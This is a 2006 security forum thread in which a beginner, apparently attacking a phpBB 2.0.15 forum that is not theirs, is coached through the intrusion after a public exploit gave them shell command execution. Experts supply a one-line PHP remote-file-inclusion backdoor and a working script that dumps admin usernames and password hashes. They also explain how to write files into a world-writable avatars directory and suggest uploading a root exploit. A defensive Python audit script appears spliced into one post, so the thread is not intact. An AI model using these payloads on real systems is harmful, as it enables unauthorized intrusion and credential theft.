IT Security and Insecurity Portal

PLEASE HELP, don't know where to post!! :( (phpBB 2015)

Posted: Thu Jun 01, 2006 4:01 pm
utilizator
Regular user
Joined: Jun 01, 2006
Posts: 11

Hello all first,
I'm reading this forum for a month or so trying to get a solution to hack a phpBB 2.0.15 forum...
Finally found this exploit http://downloads.securityfocus.com/vulnerabilities/exploits/phpbb2_0_15.pl , figured out Perl also, and the exploit works; after execution, the ls command works.
So the only thing I found on this forum was to "cat config.php"
so I did, and ended up with:
Code: |
<?php
// phpBB 2.x auto-generated confi
// Do not change anything in this
$dbms = 'mysql';
$dbhost = 'localhost';
$dbname = 'theforumdbname';
$dbuser = 'thedbuser';
$dbpasswd = 'thedbpass';
$table_prefix = 'phpbb_';
define('PHPBB_INSTALLED', true);
|
Ok, so now I have theforumdbname, thedbuser and thedbpass ... and? what to do next?
I see that the sql connection must be from localhost, but I don't have access to the server where the forum is hosted, and I don't know the phpmyadmin login page.
I'm pretty sure that the 'wget' command is disabled or something, because wget-ing smth doesn't work but "wget --version" does...
So I'm kinda stuck, and didn't find any answers on this forum, neither on google...
If anyone can help me, I thank you in advance!
PS: Sorry for the poor english...

Posted: Thu Jun 01, 2006 4:20 pm
Chb
Valuable expert
Joined: Jul 23, 2005
Posts: 206
Location: Germany

First, figure out in which directories you can write. Then write a shell or a script which connects to MySQL and prints the username+hash for you.
What does "uname -a" and "id" say? And if it is *BSD you can also try "fetch" instead of "wget".

...

Posted: Thu Jun 01, 2006 4:33 pm
utilizator
Regular user
Joined: Jun 01, 2006
Posts: 11

1. theforumdbname, thedbuser and thedbpass, I have replaced them on this post; in fact that exploit had shown me the real ones.
2. ls -l gets this:
Code: |
phpBB2.0.15> ls -l
total 385
drwxr-xr-x 2 32028 web-user 736 Oct 20 2005 admin
drwxr-xr-x 2 32028 web-user 112 Oct 20 2005 cache
-rw-r--r-- 1 32028 web-user 6726 Feb 17 13:17 common.php
-rw-r--r-- 1 32028 web-user 276 May 16 18:09 config.php
drwxr-xr-x 3 32028 web-user 320 Feb 21 01:33 db
drwxr-xr-x 2 32028 web-user 296 Oct 20 2005 docs
-rw-r--r-- 1 32028 web-user 810 Feb 17 13:17 extension.inc
-rw-r--r-- 1 32028 web-user 3643 Feb 17 13:17 faq.php
-rw-r--r-- 1 32028 web-user 45673 Feb 17 13:17 groupcp.php
drwxr-xr-x 4 32028 web-user 160 Oct 20 2005 images
drwxr-xr-x 2 32028 web-user 976 Oct 20 2005 includes
-rw-r--r-- 1 32028 web-user 14515 Feb 17 13:17 index.php
-rw-r--r-- 1 32028 web-user 523 Feb 15 17:47 index_avarie.php
drwxr-xr-x 4 32028 web-user 144 Oct 20 2005 language
-rw-r--r-- 1 32028 web-user 7748 Feb 17 13:17 login.php
-rw-r--r-- 1 32028 web-user 12150 Feb 17 13:17 memberlist.php
-rw-r--r-- 1 32028 web-user 37796 Feb 17 13:17 modcp.php
-rw-r--r-- 1 32028 web-user 34445 Feb 17 13:17 posting.php
-rw-r--r-- 1 32028 web-user 72541 Feb 17 13:17 privmsg.php
-rw-r--r-- 1 32028 web-user 3947 Feb 17 13:17 profile.php
-rw-r--r-- 1 32028 web-user 43265 Feb 17 13:17 search.php
drwxr-xr-x 3 32028 web-user 112 Oct 20 2005 templates
-rw-r--r-- 1 32028 web-user 23154 Feb 17 13:17 viewforum.php
-rw-r--r-- 1 32028 web-user 7233 Feb 17 13:17 viewonline.php
-rw-r--r-- 1 32028 web-user 45228 Feb 17 13:17 viewtopic.php
phpBB2.0.15>
|
So you tell me which one I can write....
uname -a:
Code: |
Linux web-hosting2.provider 2.6.15-vs2.0.1-gentoo-r5 #1 SMP PREEMPT Wed May 17 11:02:29 EEST 2006 i686 Intel(R) Xeon(TM) CPU 3.00GHz GenuineIntel GNU/Linux
phpBB2.0.15>
|
And I have another problem I forgot about: the cd command doesn't work; I can ls through dirs or files within dirs, though.
Any idea?

Posted: Thu Jun 01, 2006 6:47 pm
Chb
Valuable expert
Joined: Jul 23, 2005
Posts: 206
Location: Germany

I told you to execute "id". With this information you can look which directories are writable for your user; otherwise look for chmod 777 (google how to find it... e.g. /images/avatars).
1.: I know.
3.: In almost all linux utilities you can give the absolute path as parameter, so "pwd".

ok...

Posted: Thu Jun 01, 2006 7:20 pm
utilizator
Regular user
Joined: Jun 01, 2006
Posts: 11

chmod 777 - no effect whatsoever; I think you must be admin-logged in order for that to work.
the pwd result:
Code: |
phpBB2.0.15> pwd
/hosting/www/www.domain.com-docs/forum
phpBB2.0.15>
|
the id result:
Code: |
phpBB2.0.15> id
uid=81(apache) gid=81(apache) groups=81(apache)
|
and also, hooray!!! ^^^:
Code: |
phpBB2.0.15> ls images -l
total 13
drwxrwxrwx 3 32028 web-user 4472 May 31 19:37 avatars
|
!!!
But what now?

Posted: Thu Jun 01, 2006 8:22 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

So you have php scripting level access + shell command execution possibilities. Now you must write some simple upload php script directly to the webserver (example - use 'echo "<php?....blablabla..." >> /hosting/www/www.domain.com-docs/forum/myupload.php' commands). And with the upload script just upload whatever you need for the next step - like a root exploit, written in C language (if gcc is available).
But as it seems to be shared (virtual) hosting, I don't believe that you can get that b0x r00ted.
Anyway - try "cat /proc/version" to determine the kernel version.

hmm...

Posted: Thu Jun 01, 2006 8:27 pm
utilizator
Regular user
Joined: Jun 01, 2006
Posts: 11

ok, thanks waraxe for noticing me... but... I'm posting under the n00b section... you've got me all confused now... where to write the script? and how to upload it... anyway... I just want admin privileges on the forum...
sorry... but if you have some time, please explain more...
sorry again if I'm bothering you...

Posted: Thu Jun 01, 2006 8:37 pm
utilizator
Regular user
Joined: Jun 01, 2006
Posts: 11

* Sorry for the multi-post, but I just tried this:
Obviously the 'avatars' dir within the 'images' one has chmod 777:
Code: |
phpBB2.0.15> ls images -l
total 13
drwxrwxrwx 3 32028 web-user 4472 May 31 19:37 avatars
-rw-r--r-- 1 32028 web-user 169 Oct 20 2005 index.htm
drwxr-xr-x 4 32028 web-user 872 Feb 21 01:20 smiles
-rw-r--r-- 1 32028 web-user 807 Oct 20 2005 spacer.gif
phpBB2.0.15>
|
* So I try to upload some text file on the webserver:
Code: |
phpBB2.0.15> wget http://mydomain.com/loghin/l.txt images/avatars/
phpBB2.0.15>
|
* And end up with nothing; 'cat' does nothing:
Code: |
phpBB2.0.15> cat images/avatars/l.txt
phpBB2.0.15>
|
* And the avatars folder is full with jpegs:
Code: |
phpBB2.0.15> ls images/avatars
|
* Am I doing something wrong? What else is there to do?

Posted: Thu Jun 01, 2006 9:05 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Ok, I suggest trying to write a 1-line-long php script to the webserver.
Maybe to the avatars directory?
This php script contains only one line:
Code: |
<?php include($r);?>
|
or
Code: |
<?php include(stripslashes($_GET['r']));?>
|
How to write this script to the server?
Try first some simple text file with the "echo" command..
Like:
Code: |
echo test >> /hosting/www/www.domain.com-docs/forum/images/avatars/test.txt
|
and if it works, you can see the text file:
http://www.domain.com/forum/images/avatars/test.txt
In this way you can add text line by line to the file!
And finally - when you have that one-line php script working, you can try:
http://www.domain.com/forum/images/avatars/test.php?r=http://www.yahoo.com
... and hopefully you will see the yahoo page ...
This gives you the possibility of remote file inclusion. So you can put some bigger php script on your own server and execute it on the victim server.
Very simple script for admin password dumping:
Code: |
<?php
error_reporting(E_ALL);
include('config.php');
$h=mysql_connect($dbhost,$dbuser,$dbpasswd);
mysql_select_db($dbname,$h);
$res=mysql_query("SELECT username,user_password FROM ".$table_prefix."users WHERE user_level=1",$h);
$row=mysql_fetch_row($res);
$un=$row[0];$pw=$row[1];
echo "$un:$pw";
?>
|
I wrote and tested that within 5 minutes and it works as expected.
Upload this script to your own server, then
http://www.domain.com/forum/images/avatars/test.php?r=http://www.yourownserver.com/myscript.php
and you will see the first admin's username and password md5 hash encountered in the database.
Of course, you can write this bigger script right to the victim server, passing the remote inclusion tricks. It's your choice ...
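The whole chain above depends on one misconfiguration: a directory under the web root (images/avatars, mode 777 in the listing earlier in the thread) that the web server user can write to and that will execute a PHP file placed there. The audit script below is an added example for this page, not code from the thread, from phpBB or from the forum; it walks a web root, flags world-writable directories and any script-like files inside them, and runs against a constructed temp tree that mirrors the thread's ls -l output (file names and contents are made up for the demo).

```python
import os
import stat
import tempfile

# Extensions the web server would execute if such a file landed in an upload dir.
SCRIPT_EXTS = {".php", ".php3", ".php4", ".php5", ".phtml", ".inc"}


def audit_webroot(root):
    """Walk a web root and return sorted (kind, relative_path) findings.

    'world_writable_dir'      - any directory writable by 'others' (o+w)
    'script_in_writable_dir'  - a script-like file sitting inside such a dir
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if not os.stat(dirpath).st_mode & stat.S_IWOTH:
            continue
        rel = os.path.relpath(dirpath, root)
        findings.append(("world_writable_dir", rel))
        for name in filenames:
            if os.path.splitext(name)[1].lower() in SCRIPT_EXTS:
                findings.append(("script_in_writable_dir", os.path.join(rel, name)))
    return sorted(findings)


def build_sample_tree():
    """Constructed tree mirroring the thread: a 755 images dir and a 777
    images/avatars holding a real avatar plus a dropped test.php."""
    root = tempfile.mkdtemp(prefix="phpbb_audit_")
    avatars = os.path.join(root, "images", "avatars")
    os.makedirs(avatars)
    samples = {
        "config.php": "<?php $dbms = 'mysql';",
        "images/avatars/photo.jpg": "not really a jpeg (constructed)",
        "images/avatars/test.php": "<?php echo 'dropped file (constructed)';",
    }
    for rel, content in samples.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(content)
    os.chmod(os.path.join(root, "images"), 0o755)
    os.chmod(avatars, 0o777)  # the misconfiguration found in the thread
    return root


if __name__ == "__main__":
    for kind, path in audit_webroot(build_sample_tree()):
        print(f"{kind}: {path}")
```

Run it against a real phpBB root as the web server user; every `world_writable_dir` hit is a candidate for a tighter mode plus a web server rule that refuses to execute scripts from upload directories.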

hmm...

Posted: Thu Jun 01, 2006 9:34 pm
utilizator
Regular user
Joined: Jun 01, 2006
Posts: 11

ok, so,
Code: | echo test >> /hosting/www/www.domain.com-docs/forum/images/avatars/test.txt |
makes the txt file but it contains the word test written several times, like this:
Code: | test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test |
nevertheless, the command:
Code: | echo "<?php include(stripslashes($_GET['r']));?>" >> /hosting/www/www.domain.com-docs/forum/images/avatars/test.php |
indeed creates the test.php file, and after 'cat'-ing images/avatars/test.php, I see the:
Code: | <?php include(stripslashes($_GET['r']));?> |
written several times, and also
Code: | http://www.domain.com/forum/images/avatars/test.php?r=http://www.yahoo.com |
doesn't work...
I know this is the right track, but what now?

Posted: Thu Jun 01, 2006 9:43 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Probably "allow_url_fopen=0"
Hmm, so you can try to construct this script:
Code: |
<?php
error_reporting(E_ALL);
include('config.php');
$h=mysql_connect($dbhost,$dbuser,$dbpasswd);
mysql_select_db($dbname,$h);
$res=mysql_query("SELECT username,user_password FROM ".$table_prefix."users WHERE user_level=1",$h);
$row=mysql_fetch_row($res);
$un=$row[0];$pw=$row[1];
echo "$un:$pw";
?>
|
line by line.
As you know, "echo bla > x.txt" creates or overwrites the file,
but "echo bla >> x.txt" adds one line to the file. So you can build the script line by line.

back...

Posted: Sat Jun 03, 2006 1:51 pm
utilizator
Regular user
Joined: Jun 01, 2006
Posts: 11

Sorry, but I had some ISP trouble and no internet connection...
Tried again to connect to that forum, and it worked, but the ls, cat, rm (the only ones I've tested) commands don't work anymore.
So I echoed a test.txt file where I knew the chmod 777 was (images/avatars), and when I tried to display it (http://theadress.com/forum/images/avatars/test.txt) it worked!
So I tried this:
Code: |
phpBB2.0.15> echo "<?php" >> /hosting/www/www.site.com-docs/forum/images/avatars/test.php
phpBB2.0.15> echo "error_reporting(E_ALL);" >> /hosting/www/www.site.com-docs/forum/images/avatars/test.php
phpBB2.0.15> echo "include('config.php');" >> /hosting/www/www.site.com-docs/forum/images/avatars/test.php
phpBB2.0.15> echo "$h=mysql_connect($dbhost,$dbuser,$dbpasswd);" >> /hosting/www/www.site.com-docs/forum/images/avatars/test.php
phpBB2.0.15> echo "mysql_select_db($dbname,$h);" >> /hosting/www/www.site.com-docs/forum/images/avatars/test.php
phpBB2.0.15> echo "$res=mysql_query("SELECT username,user_password FROM ".$table_prefix."users WHERE user_level=1",$h);" >> /hosting/www/www.site.com-docs/forum/images/avatars/test.php
phpBB2.0.15> echo "$row=mysql_fetch_row($res);" >> /hosting/www/www.site.com-docs/forum/images/avatars/test.php
phpBB2.0.15> echo "$un=$row[0];$pw=$row[1];" >> /hosting/www/www.site.com-docs/forum/images/avatars/test.php
phpBB2.0.15> echo "echo "$un:$pw";" >> /hosting/www/www.site.com-docs/forum/images/avatars/test.php
phpBB2.0.15> echo "?> " >> /hosting/www/www.site.com-docs/forum/images/avatars/test.php
phpBB2.0.15>
|
but, what do you know? http://theadress.com/forum/images/avatars/test.php doesn't do anything...
I don't know what happened 2 days ago and why those commands don't work, and I also don't know what I am doing wrong with the php code...
Code: |
<?php
error_reporting(E_ALL);
include('config.php');
$h=mysql_connect($dbhost,$dbuser,$dbpasswd);
mysql_select_db($dbname,$h);
$res=mysql_query("SELECT username,user_password FROM ".$table_prefix."users WHERE user_level=1",$h);
$row=mysql_fetch_row($res);
$un=$row[0];$pw=$row[1];
echo "$un:$pw";
?>
|
Do I need to replace smth in the code? Because I had written it like it is...
Isn't there anything else I can do? Maybe use theforumdbname, thedbuser and thedbpass somehow?

Posted: Sat Jun 03, 2006 2:39 pm
Chb
Valuable expert
Joined: Jul 23, 2005
Posts: 206
Location: Germany

Yes, you have to change it.
If you knew what you had been copying, you would know that "config.php" is included. And where is it? I'm sure that it isn't in "images/avatars"... So set the path via ".." or use the absolute path.

Posted: Sat Jun 03, 2006 2:49 pm
utilizator
Regular user
Joined: Jun 01, 2006
Posts: 11

Chb wrote: | Yes, you have to change it.
If you knew what you had been copying, you would know that "config.php" is included. And where is it? I'm sure that it isn't in "images/avatars"... So set the path via ".." or use the absolute path. |
I don't, remember? "Newbies corner"....
So please tell me, I understand that I need to change this line:
Code: | include('config.php'); |
with one of these (?):
Code: | include('/hosting/www/www.site.com-docs/forum/config.php'); |
Code: | include('http://www.site.com/forum/config.php'); |
?
And if so, do I need to include the address (which one?) between?
Thanks all for all the help, and I hope you'll answer me once more...

Posted: Sat Jun 03, 2006 2:59 pm
utilizator
Regular user
Joined: Jun 01, 2006
Posts: 11

ok, replaced one line, Code: | include('config.php'); | with Code: | include('http://site.com/forum/config.php'); | nothing happens either...

www.waraxe.us Forum Index -> Newbies corner
Page 1 of 2